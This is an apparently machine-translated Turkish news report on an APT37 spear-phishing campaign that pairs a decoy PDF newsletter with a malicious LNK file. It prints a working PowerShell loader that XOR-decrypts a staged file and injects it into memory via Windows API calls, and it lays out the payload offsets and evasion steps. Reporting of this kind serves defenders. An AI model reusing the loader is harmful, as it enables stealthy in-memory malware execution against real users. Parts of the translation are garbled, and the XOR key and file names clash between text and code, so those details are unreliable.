Saldırganlar, kurumsal ortamlara sızmak için kötü niyetli bir Windows kısayolu (LNK) dosyasının yanında görünüşte zararsız bir PDF bülteninden yararlanmaya başladı.
Saldırı, Ağustos 2025’in sonlarında ortaya çıktı ve Güney Koreli akademik ve devlet kurumlarını meşru bir “국가정보연구회 소식지 (52 호)” PDF bülteninin kisvesi altında hedef aldı.
Kurbanlar hem PDF yemini hem de refakatçiyi içeren bir arşiv alır .lnk Bülten olarak maskelenen dosya. Kısayol yürütüldüğünde, LNK’nın içine gömülü çok aşamalı bir PowerShell yükleyici, disk tabanlı algılamadan kaçan, tamamen bellekte ek yükleri dağıtır.
Erken analiz, LNK dosyasının hassas ofsetlerde üç ikili yükü gizlediğini ortaya koydu: ofset 0x0000102c’de bir tuzak PDF, 0x0007edc1’de bir yükleyici ikili ve 0x0015AED2’de bir son yürütülebilir.
İcra üzerine, LNK içinde bir PowerShell One-Liner bu ofsetleri okur, ikili dosyaları %TEMP% gibi aio0.dat– aio1.datVe aio1+3.b+la+tve sonra bir parti komut dosyasını başlatır (aio03.bat) yükleyiciyi çözmek ve çalıştırmak için.
Seqrite analistleri, bu filessiz yaklaşımın saldırganların asla diske nihai yükü yazarak imza temelli savunmaları atlamasına izin verdiğini belirtti.
Seqrite araştırmacılarının müteakip soruşturması, son yükün bir kez tek bir xor anahtarıyla şifresini çözdüğünü tespit etti (0x35), Windows API çağrıları aracılığıyla doğrudan belleğe enjekte edilir –GlobalAlloc– VirtualProtectVe CreateThread.
Bu yansıtıcı DLL enjeksiyon tekniği, kötü amaçlı kodun gizli bir şekilde yürütülmesini ve minimum adli eserler bırakmasını sağlar.
Yükleyici İkili İkili Tersine Mühendisliği VMware araçları ve analiz ortamlarında yürütmeyi önleyen ve APT37 olarak bilinen tehdit aktörünün yüksek karmaşıklığını teyit eden kum havuzu kaçırma rutinleri için ayrıntılı olarak mühendislik.
.webp)
$exePath = "$env:temp\tony31.dat"
$exeFile = Get-Content -Path $exePath -Encoding Byte
$key = 0x37
for ($i = 0; $i -lt $exeFile.Length; $i++) {
$exeFile[$i] = $exeFile[$i] -bxor $key
}
$buf = [Win32]::GlobalAlloc(0x40, $exeFile.Length)
[Win32]::VirtualProtect($buf, $exeFile.Length, 0x40, [ref]$old)
[Win32]::RtlMoveMemory($buf, $exeFile, $exeFile.Length)
[Win32]::CreateThread(0,0,$buf,0,0,[ref]$null)Enfeksiyon mekanizması
Enfeksiyon, kullanıcı aldatıcı olanı iki kez tıkadığında başlar .lnk Powershell’i kaputun altında tetikleyen dosya.
.webp)
Komut dosyası kendi ikili içeriğini kullanarak ayrıştırır Get-Item Ve ReadAllBytesgerçek yükleri sahnelerken ekran için tuzak PDF’nin çıkarılması.
Bir kez sahnelendikten sonra, toplu yükleyici yürütülür Invoke-Expression UTF-8 kod çözülmüş bir komut dosyasında saklanan aio02.datbu da xor şifresini çözme ve yansıtıcı enjeksiyonu düzenler aio01.dat.
Bellek içi yürütmeden yararlanarak, saldırganlar disk tabanlı taramaya dayanan geleneksel uç nokta koruma platformlarını ortadan kaldırırlar.
Yumuşak belgeleri, gömülü yükleri ve filessiz teknikleri birleştiren bu katmanlı enfeksiyon zinciri, devlet tarafından desteklenen siber casusluk kampanyalarının gelişen sofistike olmasının altını çiziyor.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.